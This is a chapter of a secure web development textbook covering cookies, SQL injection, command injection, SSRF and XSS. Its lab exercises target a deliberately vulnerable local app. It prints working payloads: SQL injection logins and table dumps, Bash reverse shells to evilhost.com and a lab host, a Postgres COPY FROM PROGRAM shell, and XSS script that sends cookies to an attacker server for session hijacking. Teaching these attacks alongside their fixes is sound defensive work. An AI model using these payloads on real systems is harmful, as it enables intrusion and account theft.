© The Author(s), under exclusive license to APress Media, LLC, part of Springer Nature 2022
M. BakerSecure Web Application Development https://doi.org/10.1007/978-1-4842-8596-1_7

7. Cookies and User Input

Matthew Baker1  
(1)
Kaisten, Aargau, Switzerland
 

In this chapter, we will look at one of the most common sources of vulnerabilities in a web application: user input. It can pose a threat when that input is either displayed in web pages, stored on the server, or executed.

We will begin by looking in some detail at how cookies are set by a web server and how they are used by the browser. Incorrect cookie settings are a frequent source of vulnerabilities. We will then examine some common user input-oriented vulnerabilities and how to fix them: injection, server-side request forgery, and cross-site scripting.

7.1 Types of User Input

We often think of user input as being form data that is sent to the server as a POST request, and this is often a source of vulnerabilities. However, we shall see that any data sent from the client to the server, or indeed the server to the client, can be a threat.

We saw in Chapter 1 that there are two classes of attack we must defend against: server side and client side. In server-side attacks, an attacker targets our server through a web client or some other tool. In client-side attacks, the attacker targets a user. The attacker tricks the user into performing some action, usually using tools already on their device such as their web browser. Poor handling of user input can lead to both types of attack.

User input includes
  • Cookies

  • Other HTTP headers, for example, User-Agent

  • Form data, both interactively and programmatically submitted

  • JSON and XML data, for example, in REST API requests and responses

  • Uploads, for example, images

  • URLs including GET parameters and path info

While not exactly user input, JavaScript, even when sent from your own site, can pose the same threats.

We looked at JSON and XML data in the last chapter. We will look at the remainder in the sections that follow.

7.2 Cookies

Cookies are key/value pairs sent from the server to the client in a response header. The client, for example, a web browser, stores them in a file and sends them to the server in a request header if certain conditions are met.

Chrome and Firefox both store cookies in a SQLite database. SQLite databases are themselves a single file. Cookies are set by the server with the Set-Cookie header:
Set-Cookie: cookie-name=cookie-settings
where
cookie-settings = cookie-value[; attr-name[=attr-value]…]
An example is
Set-Cookie: lang=en
On subsequent visits to the same site, the browser would send the following back to the server in the request headers:
Cookie: lang=en
Table 7-1

Cookie attributes supported by the Set-Cookie header

Attribute

Meaning

Expires=datetime

Do not send the cookie after the given time. The value should be given as day, month year hour:min:sec TZ.

Max-Age=secs

Do not send the cookie after the given number of seconds have elapsed.

Domain=domain

Only send the cookie for given domains.

Path=path

Only send the cookie for URLs under the named path (including subpaths).

Secure

Only send the cookie over HTTPS.

HttpOnly

Do not allow the cookie to be read by JavaScript code.

SameSite=value

Controls how the cookie is sent in cross-site requests. Described in the following text.

If the browser had multiple cookies for the same site, they would be concatenated with semicolons, for example:
Cookie: lang=en; country=AU
Additional attributes can be specified in the Set-Cookie header, for example:
Set-Cookie: lang=en; Max-Age=86400; HttpOnly

The allowable values are given in Table 7-1.

The Expires and Max-Age Attributes

The Max-Age attribute instructs the client when to stop sending the cookie, as a number of seconds from when it is received. The Expires attribute does the same thing but as an absolute time and date. The attributes are mutually exclusive: it makes little sense to send both. By default, Max-Age is 0, which means delete the cookie once the browser is closed.

Domain and Path

By default, the cookie is sent for all URLs on the host it was sent from (based on the host in the URL) and to no other hosts, also not sending it to subdomains.

If the Domain attribute is set, the cookie is sent to that domain and subdomains. For example, if Domain is set to example.com, it is sent to example.com, www.example.com, etc. If it is set to www.example.com, it is only sent to that host.

If Path is set, it is only sent for URIs under that path. For example, if Path is /api, the cookie is sent for /api, /api/call1, etc. If it is set to /, the cookie is sent to all URIs.

The Secure and HttpOnly Attributes

The Secure flag prevents the cookie from being sent to the server when the connection is not encrypted. This is especially important when cookies contain sensitive data such as session IDs. It is important to remember, however, that the cookie is still stored unencrypted on the user’s computer.

The HttpOnly flag prevents the cookie from being readable in JavaScript. In other words:
<script>
    alert(document.cookie)
</script>

will not display the cookie if HttpOnly was set. We will return to this later in the chapter when we talk about cross-site scripting.

The SameSite Cookie Setting

The SameSite attribute controls in what cross-site circumstances the cookie is sent.

If set to None, the cookie is always sent. However, modern versions of Chrome and Firefox will not send it at all unless the Secure flag is set and the page is loaded over HTTPS.

If set to Lax, then the cookie is not sent when following a link from another domain unless it is a top-level page load and a “safe” HTTP method (GET, HEAD, or OPTIONS). This means, for example, that the cookie would not be sent when loading a URL in an IMG tag on a different site.

If set to Strict, the cookie is only sent when following a link from the same domain or loading a URL directly (typing a URL into the address bar or clicking a link in an Email or other application). This is summarized in Table 7-2.
Table 7-2

The cookie SameSite attribute

Situation

None

Lax

Strict

Following links from the same domain

Sent

Sent

Sent

Direct navigation

Sent

Sent

Sent

– URL typed in an address bar

   

– URL from an email clicked on

   

– Link from other application

   

Following safe top-level links from a different domain

Sent

Sent

Not Sent

Following other links from a different domain

Sent

Not Sent

Not Sent

The behavior when following a link in an Email when SameSite is Strict is often the source of confusion. If following a link from a nonbrowser application, such as an Email client or Word document, the cookie is sent. If using a web-based Email client, the clicking causes a cross-domain link, just like clicking a link from any other website. In this situation, the cookie is not sent.

It is important to remember that the cookie attributes are directives to the browser. The server cannot control whether the browser will honor them. A user is also free to edit the browser’s cookie file and change its attributes, and also the name and value. Application security should therefore not depend on the cookie remaining unchanged, unless it is very difficult for a user or attacker to guess or derive another value (as should be the case for session cookies, for example).

Session ID Cookies

Session ID cookies are a common way for websites to keep a user logged in between requests. As HTTP is stateless, the only way to associate a user with a request is to store something on both the client and server that can be matched against each other.

When a user sends a server a username and password, for example, through a web form, the application’s back-end code can look those up in the user table of its database (in practice, the database will probably have a hashed version of the password instead of cleartext). If they match, the server creates a token. This is the session ID and can be as simple as a random string. This session ID, the user ID, and an expiry date are stored in a table on the server, and the token is sent, with a matching expiry, as a cookie to the client.

Whenever the client sends the session ID to the server, it is matched against the session table. If there is a matching row, and the expiry date has not passed, the user ID is extracted from that row, and the user is considered logged in.

In Django, the cookie is called sessionid by default, and session table in the database is called django_session. The session ID is in the column session_key. The user ID is in the column session_data. It is serialized as JSON, signed with Django’s secret key, compressed, and Base64 encoded. The signing is to prevent the database row being tampered with, for example, assigning a different user ID to an existing session ID or creating a new session ID.

The Django session ID can be extracted with the following code:
from importlib import import_module
from django.conf import settings
SessionStore = import_module(settings.SESSION_ENGINE).SessionStore
user_id = SessionStore().decode(session_data).get('_auth_user_id')

This is rarely necessary in practice as it is done by Django automatically. The user object is available as request.user in each view. If there is no session ID, or it is invalid, request.user is None.

Session IDs and the SameSite Setting

The SameSite attribute has a noticeable impact on session ID cookies. Imagine a user logs into a site coffeeshop.com. If successful, the server sends a session ID cookie in the response. Imagine it sets SameSite to None. The header would look like this:
Set-Cookie: sessionid=session-token; SameSite=None
Let us look at the situations where the cookie will be sent by the browser:
  • If the user follows a link from a page in coffeeshop.com to another page on the same domain, the cookie will be sent.

  • If the user types coffeeshop.com/someurl/ into the browser, the cookie will be sent.

  • If the user is emailed a link to coffeeshop.com/someurl/ and clicks on it, the cookie will be sent.

  • If the user follows a link to coffeeshop.com from another site, the cookie will be sent.

In all cases, the site will receive the session ID, and the user will be considered logged in without having to enter a username and password.

Now consider what happens if SameSite is set to Lax. The cookie will only be sent
  • If the user follows a link from a coffeeshop.com to another page on the same domain

  • If the user types coffeeshop.com/someurl/ into the browser

  • If the user is emailed a link to coffeeshop.com/someurl/ and clicks on it

In all these cases, the user will be considered logged in. If the user visits by following a link on another site, the user will not be logged in and will be prompted for a username and password.

Finally, if SameSite is set to Strict, the cookie will only be sent if the user follows a link from a coffeeshop.com page to another page on the same domain. In all other cases, the user will have to log in again.

Setting the same site value inappropriately can lead to certain attacks such as cross-site request forgery. We will investigate these in Chapter 8.

7.3 Injection Attacks

Injection refers to vulnerabilities where a user can submit input that is executed in some way on the server. If an input field is not validated, an attacker can insert malicious code or data. Usually, the user-entered code is concatenated with code on the server, rather than being a complete command in itself.

The most well-known injection vulnerability is SQL injection. The most common source is form fields (e.g., username/password fields, search fields), but the vulnerability can exist anywhere where data is captured from the client and executed on the server in a SQL query. Other places can include GET parameters or REST API calls.

Other types of injection include command injection, where OS commands are executed (e.g., Bash commands executed through Python’s os.system() function), and code injection (e.g., executing Python code through its eval() function). Cross-site scripting, which is effectively injecting HTML and JavaScript code, is discussed in the next chapter.

7.4 SQL Injection

Imagine a web page that asks for a user to log in by entering a username and password into an HTML form:
<form method="POST" action="/login">
<p><input  type="username"  name="username"placeholder="Username"></p>
<p><input type="password" name="password" placeholder="Password"></p>
<p><button type="submit">Sign in</button></p>
</form>
The handler for the /login URL has the following code for checking if the credentials are correct:
password_hash = hashlib.md5(password).hexdigest()
sql = "select user_id from User where username = '" + username
    + "' and password = '" + password_hash + "'"
with connection.cursor() as cursor:
        cursor.execute(sql)
        row = cursor.fetchone()
        ...

Here, username and password are taken from the two form input fields.

If the user enters a username and password that match an entry in the User table, a row will be returned by the SQL query, and the user will be logged in.

Let’s say an attacker enters the following in the username field and some random text (say, xxx) in the password field:
bob'--
When the server code is executed, the sql variable will contain the following (bold indicates the text that the user entered):
select user_id from User where username = 'bob'--' and password = 'xxx'
The -- begins a comment in SQL, so everything after it is ignored. The SQL engine will therefore only see the following:
select user_id from User where username = 'bob'

So long as the user bob exists, a row will be returned regardless what the password is. The attacker will be logged in.

If the attacker did not know a valid username, they could enter the following for the username:
anyusername' or 1=1 limit 1--
Ignoring the part after the comment, the SQL engine will execute
select user_id from User where username = 'anyusername' or 1=1 limit 1

Regardless of whether a user called anyusername exists, the or 1=1 clause will select all rows from the User table. In case multiple rows break subsequent code, the attacker adds limit 1 to restrict the output to a single row.

If the database user allows the creation of User table entries, the attacker could enter the following in the username field:
select user_id from User where username = 'anyusername' or 1=1 LIMIT 1;
    insert into User (username, password) values ('myusername', 'mypasswordhash')--

The semicolon ends a SQL statement and begins a new one. Not only would the attacker be logged in as the first user in the order rows are returned but would also be able to create their own user. Similarly, the attacker could delete or alter rows.

Schema Discovery

Each of the preceding examples required that the attacker know the column names in the user table, though username and password would have been obvious guesses. The last example required the attacker to know that the user table is called User. In Django, this is not the case; it is auth_user. The attacker could of course try many different names (auth_user is also a sensible guess, as many applications are built with Django). However, an attacker could also query the schema to find out what the table is called.

Imagine a search form that looks something like the following:
<form method="POST" action="/search">
<p>input name="search" placeholder="Enter search term"></p>
<p><button type="submit">Search</button></p>
</form>

Clicking Search causes matches to be displayed in a page.

The SQL query is constructed on the server with
sql = "select name, description from Product "
    + "where name like '%" + searchterm + "%' OR description like '%"
    + "%'"
Now imagine the attacker enters the following in the search field:
xxx' union select schemaname, tablename from pg_catalog.pg_tables--

The union keyword joins two select queries together. The only requirement is that the number and types of the selected columns match. In the server code, two varchar columns, name and description, are selected. The attacker ensures they select two columns of type varchar.

The catalog.pg_tables table in Postgres contains the names of all the tables in the database. Fortunately, it has two useful varchar columns: schemaname and tablename.

Most likely, no results will be returned by the actual search string xxx. However, the other select statement will return all the schema and table names in the database as part of the search results.

Now the attacker does not have to know what the user table is called. They can get Postgres to tell them. They do have to know that Postgres is the database engine. They could just try the correct syntax for all popular databases—there are not that many. Alternatively, they could run nmap. Recall from Chapter 5 that nmap revealed that Postgres was running.

The attacker would still have to know that the search query selected two columns and they were both varchar’s. The format of the search results might give them a hint. If not, they could use trial and error. Databases don’t have so many data types, and they could try them exhaustively:
  • int

  • float

  • varchar

  • int, int

  • int, float

  • int, varchar

and so on. If the query included a float, say, they would be unable to find a matching column in pg_catalog.pg_tables. However, they could select a hard-coded value:
xxx' union select tablename, 0.0 from pg_catalog.pg_tables--

Once they find a query that works, they can run a few more: one to get the schema names, another to get the column names, and so on. This is another reason why detailed error messages should not be displayed for users—it can reveal the schema to attackers. Hiding errors may not prevent a determined attack, but the attacker will need more queries, which may be noticed when monitoring logs or traffic.

Of course our attacker would probably not enter all these queries manually. They would script them, or use an existing tool. One open source tool is sqlmap.1

Finding SQL Injection Vulnerabilities

The easiest way for an attacker to spot a SQL injection vulnerability is to enter a single quote in a form field by itself and see if an error is raised. Say the form field was a search box. If the server code is secure, entering a single quote should either return no results or return results that really did contain a single quote. If a vulnerability exists, the server would either return an error or something indicating the code failed, for example, a blank page.

Defending Against SQL Injection

The obvious defense against SQL injection is to sanitize user input—escape or remove quote characters, semicolons, dashes, etc. However, this must be done carefully. For example, code to filter out a single quote is often confused if the string contains a null byte before it. Therefore, the string
%00'

may well prevent the quote deletion from succeeding. Hackers also replace a single quote with its ASCII value %27 to avoid detection.

A far safer defense is to not use string concatenation at all. Instead, use prepared statements.

Prepared statements are a feature of SQL engine APIs. Placeholders are inserted into the SQL query where user-provided data is expected. The statement is compiled, and the user input is passed as a parameter to the execution function along with the compiled SQL statement. They also improve performance, especially if the query is reused, as it only needs to be compiled once.

The syntax varies between SQL libraries. Our VMs use psycopg2. An example prepared statement is as follows:
cursor.execute('select * from Product where name = %s', myname)
The placeholder is %s. The cursor.execute() function compiles the statement and then inserts the parameters that follow the comma, in this case myname. Multiple parameters can be passed as a tuple, for example:
cursor.execute('select * from Product where name = %s and desc=%s', (myname, mydesc))

If the user-provided name or desc contains quotes, comment characters, semicolons, etc., they will be part of the placeholder replacement, not additional SQL query syntax.

Note that %s is the placeholder for all data types, not just strings. For example, use %s, not %d, for integers.

Also, it is important to separate the SQL string from the parameters with a comma, not a percent. The following is Python’s formatted string syntax as is as vulnerable as string concatenation:
cursor.execute('select * from Product where name = %s' % myname) # don't do this!
The psycopg2 package makes it a bit harder for us when we want to use a like clause, for example:
sql = "select * from Product where name like '%" + myname + "%'"
Firstly, the percent characters would have to be quoted by doubling them so that psycopg2’s percent substitution doesn’t try to process them:
sql = "select * from Product where name like '%%%s%%'"
...
cursor.execute(sql, myname) # doesn't work
However, this still does not work. psycopg2’s automatic type conversion will put quotes around the contents of myname, breaking the syntax. Also, we have to escape any percent characters in the search term itself, in case the user entered a percent character as part of the search string. The following code is rather ugly but works.
sql = "select * from Product where name like %s"
...
cursor.execute(sql, '%' + myname.replace('%', '%%') + '%') # works
SQL Injection
The queries and code for this exercise are in the
/vagrant/snippets/injection.txt

file inside the Coffeeshop VM.

The Coffeeshop application has a SQL vulnerability in the search function. Visit the Coffeeshop URL at

http://10.50.0.2

and enter a search term (e.g., dark). Now take a look at the code (search() in views.py). The vulnerability exists because of this line:
template = "SELECT id, name, description, unit_price" +
        "    FROM coffeeshop_product" +
        "   WHERE (LOWER(name) like '%{}%'" +
        "          or LOWER(description) like '%{}%') "
sql = template.format(search_text.lower(), search_text.lower())

We will exploit the vulnerability by using the search term to display all usernames and hashed passwords from the auth_user table (columns username and password).

The query will be a bit more complex than the previous examples because we have an open parenthesis, which must be closed to make the SQL valid. Enter the following query into the search box:
xxx') union select id, username, password, 0.0 from auth_user --

and press Enter. You should see usernames and passwords in the search results.

Our union has to have matching data types for the selects on either side. As the code selects an integer, two strings, and a float, we have to select the same after the union. As the auth_user table has no float columns, we select a constant value.

Let’s now perform an update to make bob a superuser. We do this in Django by setting the is_staff and is_superuser columns to true:
xxx'); update auth_user set is_staff=true, is_superuser=true where username = 'bob' --

Press Enter to run the query. You should now be able to visit the admin page http://10.50.0.2/admin and log in as bob (his username is in coffeeshop.com/secrets/config.env).

We don’t want bob to be a superuser so reset his permissions, either with another SQL injection command or using the Admin page.

Removing the Vulnerability

To fix the vulnerability, we just turn the SQL statement into a prepared statement. Edit
vagrant/coffeeshopsite/coffeeshop/views.py
Inside the search function(), inside the if (search_text is not None and search_text != "):, change the code to read:
with connection.cursor() as cursor:
    sql = '''SELECT id, name, description, unit_price
               FROM coffeeshop_product
              WHERE (LOWER(name) like %s or LOWER(description) like %s)
          '''
    print(sql)
    products = []
    try:
        search_term = '%' + search_text.lower().replace('%', '%%') + '%'
        cursor.execute(sql, (search_term, search_term))
        for row in cursor.fetchall():
            (pk, name, description, unit_price) = row
            product = Product(id=pk, name=name, description=description,
                unit_price=unit_price)
            products.append(product)
    except Exception as e:
        log.error("Error in search: " + sql)
After doing so, you will have to restart Apache with
sudo apachectl restart

to pick up the code changes. If you have errors, they will be in /var/log/apache2/error.log.

After fixing the vulnerability, confirm that a legitimate search still works and that SQL injection does not.

7.5 Command Injection

Command injection vulnerabilities are similar to SQL injection. The difference is that user-supplied text is concatenated with a shell command that is executed on the server, rather than SQL code that is executed by the database.

Imagine an application that scales an image by a percentage supplied by the user:
os.system('convert myimage.jpg -resize ' + scale + '% newimage.jpg')
By now, you probably recognize why a vulnerability exists. If, for the scale term, an attacker entered
50% newimage.jpg && cat /etc/passwd #

then the server would execute the scale command as expected but would then print out the contents of the system password file. The double ampersand is a Bash and and is an effective way of joining two commands into a single command. The hash is the comment character. If the output were captured and displayed in the response, the attacker would be able to view the system users.

In this example, the output is not captured. It is, however, still a useful vulnerability for an attacker. Consider the following value for the scale term:
50% newimage.jpg && bash -c 'bash -i >& /dev/tcp/evilhost.com/9000 0>&1' #

This initiates a reverse shell. A normal shell session, initiated by a client connecting to a port on the server, normally gives the client an interactive session on the server. A reverse shell works in the opposite direction. The client connects to a port on the server, but the server gets an interactive session on the client. The >& redirects standard output and standard error. In normal usage, this would be to a file. However, Bash allows them to be redirected to a TCP port, as in this example. The 0>&1 redirects standard input to the same port. The result is that when Bash runs, the input and output are read from and written to the remote TCP port. The -i creates an interactive shell.

The outer Bash command is because os.system() runs its argument through /bin/sh, not Bash. TCP port redirection is not supported in /bin/sh, so we need an additional Bash command to interpret it.

The attacker runs a command on their server evilhost.com to open a port, in this example 9000, to listen for connections. The easiest way is with the nc command:
nc -l evilhost.com 9000

Once a connection is established, the nc command simply prints anything received on the given port to the terminal and sends terminal input to the port.

When the os.system() command is executed, the Bash command is run and connects to the hacker’s open port. The hacker can type commands, and they will be executed on the remote server. The output will be sent to the Hacker’s port. As the Bash command was started by Apache, it will be running as the same user, typically www-data, with that user’s privileges.

In the last chapter, we discussed the danger of running a web server with more permissions than necessary. The consequences should now be clear. If this vulnerability exists, then www-data has write permission on the code; the attacker can change your application. The attacker can also connect to the database and run any query permitted by the web server’s database user.

Back Doors

A reverse shell is an example of a back door: an entry point an attacker uses that was not intended by the developer. In our example, the developer expects connections over HTTP and HTTPS on ports 80 and 443, but the attacker has created a Bash entry point on port 9000.

A Bash shell using nc is useful for an attacker and dangerous for the application. However, it is still rather limiting: the attacker must be present to interactively operate the shell, it only accepts one connection at a time, and file upload and download are difficult to enact.

Fortunately for attackers, other back doors exist. It is not hard to see how nc could be replaced by a more sophisticated application that spawns a new thread for each connection and that automates commands rather than requiring them to be entered interactively.

Also fortunately for attackers, tools already exist with more features. Metasploit2 is a popular framework with many exploits built in and is also extensible. Metasploit contains exploits and payloads. Exploits are modules that take advantage of a vulnerability. One example is Metasploit’s web_delivery exploit, which takes advantage of a vulnerable web form.

Once the exploit has been executed, Metasploit delivers a payload. The user can select from a number that are supported by each exploit. A Bash reverse shell over TCP (such as the one we showed in our example) is one option, but Metasploit makes an additional 20 available for the web_delivery exploit.

Metasploit also has staged payloads. These are delivered in parts. Once the exploit is executed, Meterpreter delivers a small payload whose purpose is to download a larger one with more features. The python/meterpreter/reverse_tcp payload in Metasploit has, for example, file upload and download commands.

Defending Against Command Injection

Firstly, system commands should be used very sparingly. If developing an application in Python, use Python commands and packages wherever possible, rather than making system calls.

If making a system call is necessary, the subprocess package is safer than os.system(). We could replace our vulnerable os.system() call with
subprocess.run(['convert', 'myimage.jpg', '-resize', scale + '%', 'newimage.jpg'])

This syntax is more secure because the scale variable (with % appended to it) is always treated as a single command-line argument. Adding spaces, semicolons, ampersands, and comment character will only ever add them to the argument, not create additional arguments or commands.

The subprocess.run() also has an optional parameter to run a full command from a string, similar to os.system():
subprocess.run(cmd, shell=True) # don't do this

You should avoid this as it is as insecure as os.system().

Command Injection

The Coffeeshop application has a command injection vulnerability in the contact form. Visit the Coffeeshop URL at

http://10.50.0.2

and click Contact in the menu bar at the top. You will have to log in if you have not done so already.

Enter a message and click Send. Visit MailCatcher at
http://10.50.0.2:1080

and you should see your message.

Now connect to your CSThirdparty VM with
vagrant ssh
from the csthirdparty/vagrant directory and start an nc session:
nc -l 9000
We will initiate a reverse shell in the same way as the example shown previously, using the vulnerable contact form. Enter the following in the message body:
" && bash -c 'bash -i >& /dev/tcp/10.50.0.3/9000 0>&1' #

Take a look at the code in the contact() function in views.py to see how this works. Execute the code by sending the email.

Once the reverse shell is established, try some commands like
whoami
ls
ps x
cat /etc/passwd

End the shell session with Ctrl-C. Note that, because the Bash session is interactive, the web page will not finish loading until you quit the reverse shell.

The solution to this exercise is in coffeeshop/vagrant/snippets/injection.txt.

Combining SQL and Command Injection

The previous example required a command injection vulnerability to be present. If there isn’t one, a reverse shell can sometimes be obtained through SQL injection. Many databases, Postgres included, allow shell commands to be executed from SQL queries. In Postgres, this is disabled by default except for superusers (which is another reason for your web application not to use a superuser account to access the database).

If command execution is enabled and a SQL injection vulnerability is present, the following text in a vulnerable field will start a reverse shell:
'; CREATE TABLE trigger_test (
       tt_id serial PRIMARY KEY,
       command_output text
   );
   COPY trigger_test (command_output) FROM PROGRAM
      'bash -c ''bash -i >& /dev/tcp/evilhost.com/9000 0>&1 &''';
   --

For clarity, we have split the command onto several lines. In a real attack, it would be entered without the carriage returns.

The COPYFROM PROGRAM … command is Postgres’ syntax for running a shell command. The output is copied into a table. Of course, we need a table to copy it into, so we create the table first.

For our reverse shell, we are not interested in the output, so we don’t care if we can read the table or not (though we can with further SQL injection commands). We just want the command to be run so that it connects to our nc server.

Clearly, allowing the web application’s database user to run shell commands is dangerous, and this feature should be disabled in all but very specialist applications.

7.6 Server-Side Request Forgery

This is one of the more well-known web vulnerabilities in cross-site request forgery (CSRF), which we will discuss in detail in Chapter 8. Server-side request forgery (SSRF) is a relatively new attack and, despite its similar name, has less in common with cross-site request forgery and more with injection attacks.

SSRF vulnerabilities occur when a request is made by a client to a server that contains another request embedded in it, or enough of a request fragment that an attacker, by crafting a suitable request, can make a request the developer did not intend to make available. It is made possible because it is being called from within the server’s network, not from the outside Internet.

Imagine you have a shop that aggregates products from different sites. You make a REST API call available to the client so that it can request products from the different sites. A request looks something like
POST /product HTTP/1.1
Content-Type: application/json
{"url": "https://shop1.com/product/1"}
If the embedded URL is not sanitized, an attacker can take advantage of it to call services behind the web server’s firewall that are unavailable when called from outside the corporate network. Say the organization has an admin console running on port 9000 of the same host, and this port is blocked by the firewall. An attacker can send a request:
POST /product HTTP/1.1
Content-Type: application/json
{"url": "https://localhost:9000/admin"}

Since the embedded call is made from within the intranet, port 9000 on localhost is not blocked. If the administrators assumed that only authorized users have access to this port and therefore do not protect it with a username and password, the attacker can gain access without needing to authenticate.

This may sound like a rather obvious vulnerability, yet it exists in the real world. One existed in GitLab until June 2021 when it was patched.3 An embedded URL similar to the preceding situation was made available to integrate GitHub projects with GitLab. The vulnerability arose because attackers, even unauthenticated ones, could use the API call to make calls to other hosts internal to the network where the GitLab instance was running.

Defending Against Server-Side Request Forgery

The best defense against SSRF is to not make requests based on the contents of client-supplied requests, at least not without first sanitizing the request. If you must make this functionality available, ensure the host, port, protocol, and path match some criteria.

7.7 Cross-Site Scripting (XSS)

Cross-site scripting (XSS) is a vulnerability that occurs when an attacker is able to get their own JavaScript code sent by a server in a response and executed by the browser. There are three types:
  1. 1.

    Reflected XSS, where JavaScript code is transient rather than being stored on the server

     
  2. 2.

    Stored XSS, where the JavaScript is stored on the server

     
  3. 3.

    DOM-based XSS where only the DOM environment is changed rather than actually changing code

     

There is also Blind XSS, where JavaScript code is executed in a context that does not update the screen, for example, an asynchronous request. It is similar to Stored XSS except for being more difficult to test for.

An attacker’s aim might be to have the code executed in their own browser, but more commonly the aim is to have it executed in a victim’s browser.

XSS vulnerabilities are attractive to attackers because the JavaScript code is run in the context of the vulnerable site and is run by the victim on their own browser.

Reflected XSS

Before looking more closely at the impact XSS can have, let us look at some examples. Recall the example in Section 7.4 where we considered a vulnerable search form field. Imagine the results page contains the search term as well as the matches, for example:
Products matching searchterm:
Match 1
Match 2
...
Say an attacker entered, as the search term
<script>
some malicious JavaScript code
</script>

Then, when the search results are displayed, the page will contain the JavaScript, enclosed in legal HTML <script></script> tags, and would therefore be executed.

This is an example of Reflected XSS. The JavaScript is not stored on the server but is sent to the browser in the response and executed there.

The code is only executed in the attacker’s browser. Other users do not receive the code. This may still have a harmful impact if the developer assumed certain JavaScript code would or would not be executed. For example, client-side form validation.

However, if this is the goal of the attacker, there is an easier way to have JavaScript code executed in their browser: by editing the HTTP response before it reaches the browser. We will do this in the next exercise.

Using Http Toolkit To Alter Javascript

If you followed the setup instructions in Chapter 2, you should have HTTP Toolkit installed. We will use this to intercept and alter requests from our Coffeeshop application.

Start HTTP Toolkit. Click on the button labelled Chrome Intercept a fresh independent Chrome window. This will open a new Chrome instance. Return to HTTP Toolkit and click on the Mock icon in the menu bar on the left. We can use this tab to add rules when websites are visited.

The creation of a matcher in the HTTP toolkit is depicted in a screenshot. On the left, there are options for intercept, view, and mock, and on the right, there is a match screen.

Figure 7-1

Creating a matcher in HTTP Toolkit

Click on the + Add a new rule to rewrite requests or responses button. In the Match drop-down, select Any requests, and in the Then drop-down, select Pause the response to manually edit it.

Under Any requests, you will see another drop-down titled Add another matcher and a Plus button. Click the drop-down and select For a URL. Enter our Coffeeshop application root URL underneath, http://10.50.2/. Your window should look like Figure 7-1. Now click on the Plus button to save the matcher and then the Save button to save the rule.

You can now return to the Chrome window HTTP Toolkit opened and visit our website, http://10.50.0.2/. HTTP Toolkit will pause before the response is displayed. Return to the HTTP Toolkit. On the left you will see a list of requests Chrome has made. On the right you will see the response it is currently loading. Scroll down to the bottom of the response, down to just above the </body> tag, and enter some JavaScript:
<script>
alert(document.cookie);
</script>
Your window should look like Figure 7-2. Now click on the Resume button. Chrome will finish loading the page and execute your JavaScript, displaying your session ID and CSRF token cookies.

A screenshot displays the interception of a response with the HTTP Toolkit. It has 3 options at the left: intercept, view, and mock. On the right is the page with information about the method, status, source, host, and post and query.

Figure 7-2

Intercepting a response with HTTP Toolkit

You can now close HTTP Toolkit. It will also close the Chrome window.

Hackers are less interested in their own cookies than in other people’s and so are more likely to try to get JavaScript code executed by a victim’s browser, not their own.

One way would be to send a victim a link to a page with a reflected XSS vulnerability, crafting the link to contain malicious JavaScript. The Coffeeshop application has a vulnerable page to display a product, using the URL

http://10.50.0.2/prod/?id= extsl{productid}

If the URL is called with a valid product ID, for example:

http://10.50.0.2/prod/?id=1

then the product is displayed. If an invalid one is provided, it displays an error message stating that the requested ID was not found. Since the user input is displayed unchanged, setting it to a script, for example:

http://10.50.0.2/prod/?id=%3Cscript%3Ealert%28%22Hacked%22%29%3C%2Fscript%3E

will cause the URL-decoded script
<script>alert("Hacked")</script>

to be pasted into the page and executed. If this is emailed to a victim, it will be executed in their browser. You can try this on your Coffeeshop instance and verify that it works.

Another way to get someone else to execute your JavaScript is to get it stored on the server. This is where Stored XSS comes in.

Stored XSS

Sometimes, user input is persisted in an application’s database and then displayed in HTML pages. Examples include social media posts, blog posts, product reviews, and so on. If an attacker can get malicious JavaScript code stored there, it will be executed whenever another user visits the page that displays that input. It will be executed as that user, with that user’s cookies.

Our Coffeeshop application has one such vulnerability, in a form where users can leave comments about products. We will exploit this in the next exercise.

Exploiting a Stored XSS Vulnerability

Visit the Coffeeshop application at http://10.50.0.2 in Chrome. Log in as bob (see the file coffeeshop/secrets/config.env for the password). Now click on any of the products to see the details page.

If you are logged in, you will see a box to enter a comment at the bottom of the page. Enter
Nice coffee
<script>
alert(document.cookie)
</script>

Now reload the page. You will see the alert pop up with your session ID and the CSRF cookie. If you log out and log in again as the alice, then her cookies will be displayed.

Showing a user their own cookie is not much of a risk. An attacker prefers to have the cookie sent to them. One option is for the attacker to create a web service with a GET URL that saves cookies passed in the URL. They simply create a comment with some JavaScript to call this URL using the document.cookie value. Whenever a user views that comment, the URL will be called, sending their cookies to the attacker.

We have one such URL in our CSThirdparty application:
http://10.50.0.3/cookies/cookie-value

Take a look at the code in the views.py file for CSThirdparty. The function is called cookies() and is quite simple.

One easy way of getting a GET URL called in JavaScript is to create an <img> tag and set the source to our URL:
var i = document.createElement("img");
i.src = "http://... ";

There are other approaches, but this one is short and synchronous, avoiding potential issues such as short comment fields in the database.

XSS To Send Cookies To An Attacker

The code for this exercise is in coffeeshop/vagrant/snippets/xss.txt.

Still in Chrome as user bob, delete your comment with the Delete button. Using the preceding img tag approach, we will create a new one using the JavaScript shown before to call
http://10.50.0.3/cookies/cookie-value

with the cookies in document.cookie.

Enter the following as a product comment:
Nice coffee
<script>
var i = document.createElement("img");
i.src = "http://10.50.0.3/cookies/" + document.cookie;
</script>

By entering a real comment in addition to the script, no one looking at the HTML will know their cookies have been stolen.

Reload the page and then have a look in the csthirdparty database. The easiest way is to log into your CSThirdparty VM with
vagrant ssh
from the csthirdparty/vagrant directory and then connect to the database with
sudo -u postgres psql csthirdparty
You should find the user’s cookies in the csthirdparty_cookies table with
select * from csthirdparty_cookies;

Exploiting the Stolen Cookie

An attacker can use the stolen session ID cookie to log in as the user it belongs to. Log out from the Coffeeshop application and reload the page. Now open the Developer Tools by clicking the three vertical dots in the top-right corner of the browser; then select More Tools followed by Developer Tools. Click on the Console icon. Type the following:
document.cookie="sessionid=session-id-from-database"

substituting the session ID value from the cookie you saved in the CSThirdparty database.

Now refresh the page and close the Developer Tools. You should find that you are now logged in as bob.

To clean up, delete the comment again. You can also delete the cookies from the database.

DOM-Based XSS

Dom-based XSS vulnerabilities occur when an attacker can submit JavaScript (through GET parameters, form input, etc.) that is used when modifying the DOM programmatically, for example, using innerHTML.

Consider, for example, a page for reporting an error. When the URL
http://example.com/error?errortext=error-message
is sent, the page is updated in JavaScript with
var para = document.createElement("p");
var text = document.createTextNode(errorText);
para.appendChild(text);
var errors = document.getElementById("errors");
errors.appendChild(tag);

Here, errorText is the text coming from the URL.

If the server does not sanitize the user-submitted text and an attacker includes JavaScript code inside a <script> tag, that JavaScript code will be executed when added to the DOM.

A page like this might exist in an application where there is no server-side rendering. It therefore relies on JavaScript to customize the contents.

Defending Against Cross-Site Scripting

